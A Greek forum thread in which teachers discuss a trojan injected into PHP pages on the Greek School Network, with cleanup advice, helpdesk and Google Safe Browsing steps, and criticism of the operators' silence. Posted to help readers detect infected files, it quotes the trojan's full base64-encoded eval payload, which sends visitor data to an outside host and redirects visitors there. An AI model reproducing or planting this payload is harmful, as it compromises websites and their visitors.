Παραβίαση ασφαλείας των σελίδων του ΠΣΔ

[alkisg]

Μάλλον αυτό: https://alkisg.mysch.gr/steki/index.php?topic=3846.msg40550#msg40550

Πρέπει επιτέλους να πάρουν κεντρικά μέτρα από το ΠΣΔ, έχει 15 μέρες πια η ιστορία με την παραβίαση ασφαλείας του και ούτε έλυσαν το πρόβλημα, ούτε ανακοίνωση δεν έκαναν ακόμα...

[P.Tsiotakis]

το βγάζει σε πολλούς ιστότοπους του ΠΣΔ, συνάδελφε
και στο στέκι κάθε φορά που το επισκέπτομαι

περιμένω τη  επαναφορά και γω...κάποια στιγμή είδα τα αρχεία αλλά όχι τη βάση δεδομένων
ίδωμεν

[alkisg]

Παναγιώτη από το στέκι έχω αφαιρέσει μόνος μου τον trojan, ενώ στο site σου παραμένει.
Καλύτερα θα είναι να τον βγάλεις κι εσύ, γιατί από το ΠΣΔ μπορεί να αργήσουν...

Στέκι, όλα καλά:

$ wget -q https://alkisg.mysch.gr/steki/ -O -

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<link rel="stylesheet" type="text/css" href="https://alkisg.mysch.gr/steki/Themes/default/css/index.css?rc5" />
...κτλ κτλ

Site σου, μολυσμένο:

$ wget -q http://users.sch.gr/ptsiotakis/ -O -

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Security report #1186 / 2011-04-28</title>
</head>
<frameset rows="*,20">
<frame src="http://nimelts.cz(bad).cc/downloads/">
<frame src="http://nimelts.cz(bad).cc/xp/index.php?tp=3fb41d99137405e1" noresize scrolling="no">

</frameset>
</html>

Το (bad) το έβαλα επίτηδες για να μην πάει κάποιος κατά λάθος εκεί και κολλήσει.
Μπες με ftp στο site σου και δες ποιο .php αρχείο έχει αλλαχθεί στις 13/4...
Btw ο injected php κώδικας έχει κάποιον έλεγχο και κάνει redirect στο cz.cc μόνο μερικές φορές, όχι πάντα, οπότε το wget μπορεί να μην δείχνει πάντα το ανεπιθύμητο url.


Το προειδοποιητικό μήνυμα που βγάζουν οι browsers είναι άλλο θέμα, αφορά γενικά το users.sch.gr/* λόγω των συχνών εμφανίσεων του trojan σε αρκετούς χρήστες (υποφακέλους). Οπότε θα συνεχίσει να εμφανίζεται μέχρι το ΠΣΔ να καθαρίσει εντελώς και να βγει από την blacklist. Στο μεταξύ όμως καλό είναι τουλάχιστον εμείς οι Πληροφορικοί που έχουμε την τεχνογνωσία, να αφαιρέσουμε τον trojan από τις σελίδες μας, για να μην κολλάμε τους επισκέπτες...

[pfan]

Επειδή είχα πρόβλημα και στο δικό μου σχολείο καθάρισα (με τη βοήθεια του Άλκη) τις σελίδες και άνοιξα ένα δελτίο στο helpdesk.sch.gr για να αναφέρω το πρόβλημα και ότι παρατηρείται και σε άλλα σχολεία. Η απάντηση που πήρα ήταν ότι πρέπει να δηλώσω σε ποια σχολεία υπάρχει το πρόβλημα. Οπότε καλό είναι όσοι έχουν το πρόβλημα να ανοίξουν ένα δελτίο στο helpdesk.

@Άλκη μήπως το θέμα αυτό να φύγει από την ΑΕΠΠ

(Χρόνια πολλά σε όλους!!!)

[Λάμπρος Μπουκουβάλας]

Είχα κι εγώ πρόβλημα στο http://users.sch.gr/lambrosbouk
Έστειλα ένα τεχνικό δελτίο μέσα στη Μεγάλη Εβδομάδα και ο Θοδωρής Μπρότσης από το παν. Θεσσαλίας μου έλυσε το πρόβλημα την επόμενη μέρα.

[alkisg]

Λάμπρο μου εφόσον είχαν τρύπα ασφαλείας στο web hosting τους και γέμισε ο σκληρός τους δίσκος με τον trojan, ας κάνουν μια μαζική εύρεση και διαγραφή του κώδικά του και να τον διώξουν σε 2 λεπτά.
Δεν χρειάζεται να περιμένουν τον κάθε χρήστη του ΠΣΔ που έχει αρχεία .php να καταλάβει ότι έχει κολλήσει trojan και να το αναφέρει στο helpdesk. Η πλειονότητα των χρηστών του ΠΣΔ δεν είναι Πληροφορικοί και δεν είναι σίγουρο ότι θα καταλάβουν και θα αναφέρουν το πρόβλημα. Μάλιστα και αρκετοί Πληροφορικοί μπορεί να μην καταλάβουν ότι φταίει το site τους, ή να περιμένουν να διορθωθεί από μόνο του.

Αν δεν λάβουν κεντρικά μέτρα το καθάρισμα θα διαρκέσει μήνες, και στο μεταξύ το users.sch.gr ήδη έχει μπει σε blacklist και μας επηρεάζει όλους.

Προσωπικά όμως σημαντικότερο λάθος τους θεωρώ το ότι δεν βγήκαν να παραδεχτούν την παραβίαση ασφαλείας, και να ειδοποιήσουν τους χρήστες ότι όλα τα δεδομένα τους μπορεί να έχουν πέσει σε ξένα χέρια. Κάποιος ξένος είχε πρόσβαση σε όλο το file system του server. Είναι σοβαρά πράγματα αυτά, θα έπρεπε να είχαν λυθεί από την πρώτη μέρα, όχι να συζητάμε για τα αυτονόητα 15 μέρες μετά.

[P.Tsiotakis]

στατική html και το κεφάλι μας ήσυχο

[Λάμπρος Μπουκουβάλας]

Άλκη, συμφωνώ με όσα γράφεις.

Μου ήρθε το παρακάτω mail στις 22/4:

[pmouz]

Χρόνια πολλά σε όλους.

Τελικά το κενό ασφαλείας δεν ήταν στο φόρουμ (SMF) αλλά κάπου πιο κεντρικά στο ΠΣΔ, είτε στον apache, είτε, χειρότερα ακόμα, με τοπική πρόσβαση στο file system του web server. Συγκεκριμένα φαίνεται να προσέβαλε μαζικά πολλούς ιστοχώρους χρηστών του ΠΣΔ, γράφοντας σε όσα αρχεία .php μπορούσε, δηλαδή σε αυτά που είχαν write access στο "others".
Ο trojan έμπαινε στην αρχή αυτών των αρχείων php, με την παρακάτω κρυπτογραφημένη μορφή:

Κώδικας: php

<?php
eval(base64_decode('Z2xvYmFsICRyZXNwb25zZV9zZXNzaW9uczsNCg0KaWYoISRyZXNwb25zZV9zZXNzaW9ucykgew0KCSRyZXNwb25zZV9zZXNzaW9ucyA9ICJhbGl2ZSI7DQoNCgkkcz1iYXNlNjRfZW5jb2RlKHN0cnJldihiYXNlNjRfZW5jb2RlKHN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnUkVNT1RFX0FERFInXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkuJ3wnLnN0cl9yZXBsYWNlKCd8JywnJywkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKSkpOw0KCSR1PSdodHRwOi8vbWRteXNzZC5jei5jYy94cC9zZXNzaW9uLnBocCc7DQoJJHM9QGZpbGVfZ2V0X2NvbnRlbnRzKCIkdT90PSRzIik7DQoNCglpZihjb3VudCgkaHR0cF9yZXNwb25zZV9oZWFkZXIpKSB7DQoJCSRyZWxvYyA9ICcnOw0KCQlmb3JlYWNoKCRodHRwX3Jlc3BvbnNlX2hlYWRlciBhcyAkdikgew0KCQkJJHQ9ZXhwbG9kZSgiOiAiLCR2KTsNCgkJCWlmKHN0cnRvbG93ZXIodHJpbSgkdFswXSkpPT0ibG9jYXRpb24iKSB7DQoJCQkJJHJlbG9jID0gdHJpbSgkdFsxXSk7DQoJCQl9DQoJCX0NCgkJaWYoJHJlbG9jICYmICFzdHJsZW4oc3RycG9zKCRyZWxvYywnMDAwMDEwMjAnKSkpIHsNCgkJCWlmKCFAaGVhZGVyc19zZW50KCkpIHsNCgkJCQlAaGVhZGVyKCJIVFRQLzEuMSAzMDIgRm91bmQiKTsNCgkJCQlAaGVhZGVyKCJWYXJ5OiBBY2NlcHQtRW5jb2RpbmcsVXNlci1BZ2VudCIpOw0KCQkJCUBoZWFkZXIoIkxvY2F0aW9uOiAkcmVsb2MiKTsNCgkJCX0gZWxzZSB7DQoJCQkJZWNobyAiPGgzPlBhZ2UgTW92ZWQ8L2gzPlRoZSBwYWdlIHlvdSBhcmUgdHJ5aW5nIHRvIG9wZW4gaGFzIGJlZW4gbW92ZWQuPGJyPjxicj5Vc2UgdGhlIG5hdmlnYXRpb24gbGlua3Mgb24gdGhlIHJpZ2h0IG9mIHRoaXMgcGFnZSwgdGhlIHNlYXJjaCBib3ggYXQgdGhlIHRvcCwgb3IgdGhlIHNpdGUgbWFwIGxpbmsgYmVsb3cgdG8gZmluZCB0aGUgbmV3IGxvY2F0aW9uIG9mIHRoZSBwYWdlIHlvdSdyZSBzZWVraW5nLjxicj48YnI+Q2xpY2sgdGhlIGxpbmsgYmVsb3cgdG8gZm9sbG93IG5ldyB1cmwuPGJyPjxicj48YSBocmVmPVwiIi4kdS4iXCI+Ii4kdS4iPC9hPiI7DQoJCQkJZWNobyAic2NyaXB0IHR5cGU9XCJ0ZXh0L2phdmFzY3JpcHRcIj5kb2N1bWVudC5sb2NhdGlvbiA9IFwiIi4kdS4iXCI7PC9zY3JpcHQ+IjsNCgkJCX0NCgkJCWV4aXQ7DQoJCX0NCgl9DQp9'));?><?php και εδώ συνεχίζει το αρχικό αρχείο...

Αν έχετε ιστοχώρο στο ΠΣΔ με php αρχεία, αν θέλετε ρίξτε μια ματιά να δείτε αν κάποια από αυτά τροποποιήθηκαν στις 13/4, κι αν ναι, ελέξτε ότι δεν ξεκινάνε με την παραπάνω γραμμή.

Είχα αναφέρει το πρόβλημα στο helpdesk.sch.gr και τους πρότεινα να κάνουν μια κεντρική ανακοίνωση για να ενημερώσουν όλους τους εκπαιδευτικούς για το πρόβλημα, ώστε τουλάχιστον όσοι κόλλησαν να αφαιρέσουν τον ιό. Σήμερα μου απάντησαν ότι είναι ενήμεροι και έκλεισαν το σχετικό δελτίο.

Και στην προσωπική μου ιστοσελίδα στο sch  είχε πάει στο configuration.php και είχε βάλει το eval(...) στην αρχή του αρχείου με αποτέλεσμα να φορτώνει κάποια άλλη ιστοσελίδα. Όποιος το έκανε να του καεί ο υπολογιστής...

[Keep Growing]

"...maintenance downtime or capacity problems", με την υπομονή και τα νεύρα μας.

Γιατί δε λένε: "joomla και wordpress (php γενικά) απαγορεύονται στο ΠΣΔ", ώστε και μεις να βρούμε την υγειά μας αλλά και το "ψηφιακό σχολείο" να χτιστεί από primitive programmers. 

[amichail]

Λυπάμαι που το λέω, αλλά τόσες μέρες μετά τον ιό, εξακολουθεί να μου βγάζει προειδοποίηση για ορισμένα θέματα στο ΣΤΕΚΙ.
Κοινό χαρακτηριστικό τους έχουν ότι σε όλα περιλαμβάνεται ανάρτηση του κου Τσιωτάκη.
Απ΄όσο μπορώ να δω, σε όσα δεν έχει καταθέσει ακόμα την (πολύτιμη) άποψη του δεν μου βγάζει προειδοποίηση.
Παίζει κάτι με το προφίλ π.χ.; έχει σύνδεση με το site που ειρήσθω εν παρόδω δυστυχώς βγάζει ακόμα και αυτό το ίδιο μήνυμα;
ρωτάω εγώ η άσχετη 

το μήνυμα εν τω μεταξύ λέει γενικά για το users.sch.gr

Κε Τσιωτάκη, η επαναφορά που περιμένατε έγινε ή μάλλον ακόμα; Να πιέσουμε κι εμείς το helpdesk;

Μήπως έχω εγώ το πρόβλημα;

[P.Tsiotakis]

εμένα και στο στέκι μου βγάζει μήνυμα για "κακόβουλο σιτε" κάθε φορά που το επισκέπτομαι (πατώ συνέχεια και εισέρχομαι)
από τη δική μου ιστοσελίδα "κατέβασα" το wordpress (php κομμάτι) και είναι όλες στατικές html σελίδες

φυσικά, μπορείς να στείλεις μήνυμα και συ στο helpdesk...

Παναγιώτης

[alkisg]

Απ' όσο έχω καταλάβει, από την υπηρεσία safebrowsing του google ο ιστοχώρος http://users.sch.gr/ptsiotakis θεωρείται κακόβουλος και γι' αυτό μπλοκάρει όποιες σελίδες έχουν παραπομπή σε αυτόν:
http://www.google.com/safebrowsing/diagnostic?site=users.sch.gr/ptsiotakis

Ο δικός μου καθώς και το στέκι δεν χαρακτηρίστηκαν ως κακόβουλοι, πιθανώς επειδή έβγαλα άμεσα τον trojan:
http://www.google.com/safebrowsing/diagnostic?site=alkisg.mysch.gr
http://www.google.com/safebrowsing/diagnostic?site=alkisg.mysch.gr/steki

Αυτή η υπηρεσία safebrowsing χρησιμοποιείται και από τον Firefox και από τον Google chrome:
http://www.google.com/tools/firefox/safebrowsing/

Για να σταματήσει κάποιος ιστοχώρος να θεωρείται κακόβουλος, η google λέει ότι πρέπει να γίνει:

Αίτηση επανεξέτασης ιστοτόπου για κακόβουλο λογισμικό

Αφού ελέγξετε τον ιστότοπό σας και βεβαιωθείτε ότι είναι καθαρός, μπορείτε να υποβάλετε αίτημα προς επανεξέταση. Λάβετε υπόψη ότι θα χρειαστεί να επαληθεύσετε την κατοχή του ιστότοπου για να μπορέσετε να ζητήσετε να γίνει εξέτασή του.
...

Οπότε Παναγιώτη θα πρότεινα (1) να κάνεις τα παραπάνω που λέει η google για να σταματήσει το site σου να θεωρείται κακόβουλο, (2) να βγάλεις για λίγες μέρες το website σου από το προφίλ σου ώστε να μην υπάρχουν links από το στέκι στο site σου ώστε εν τέλει να μην βγαίνουν προειδοποιήσεις στα άλλα μέλη (και μετά από λίγες μέρες το ξαναβάζεις), και (3) και βασικότερο, να τα ψάλλεις στο helpdesk γιατί προφανώς θα έπρεπε να είχαν βγάλει τον trojan από την πρώτη μέρα και όχι να τον έχουν και να τον θρέφουνε ακόμα και να μας παιδεύουν όλους... 


Εγώ απορώ γιατί δεν βγήκαν ακόμα να παραδεχτούν ότι υπήρξε (και ακόμα υπάρχει) παραβίαση ασφαλείας του server και να ενημερώσουν τους χρήστες του ΠΣΔ ότι τα δεδομένα τους μπορεί να έχουν κλαπεί, οπότε τουλάχιστον να αλλάξουμε κωδικούς, ενώ αν είχαμε online ευαίσθητα δεδομένα όπως πληροφορίες για web banking ή πιστωτικές να λάβουμε τα μέτρα μας, κτλ κτλ... μου φαίνεται εντελώς απαράδεκτος ο χειρισμός του γεγονότος.

[P.Tsiotakis]

έκανα τα 1 και 2

δεν είχα ασχοληθεί με τη google, καθώς ο τελευταίος έλεγχος ήταν στις 21/4 και θεωρούσα ότι θα κάνει έλεγχο ξανά!!

[Λάμπρος Μπουκουβάλας]

πάντως εγώ ΔΕΝ είχα κανένα πρόβλημα με το στέκι, ούτε με τη σελίδα του Παναγιώτη, μετά τις διορθώσεις που έγιναν τη Μ. Εβδομάδα. το μόνο που βαρέθηκα να βλέπω στην οθόνη μου, είναι το γνωστό "proxy error"...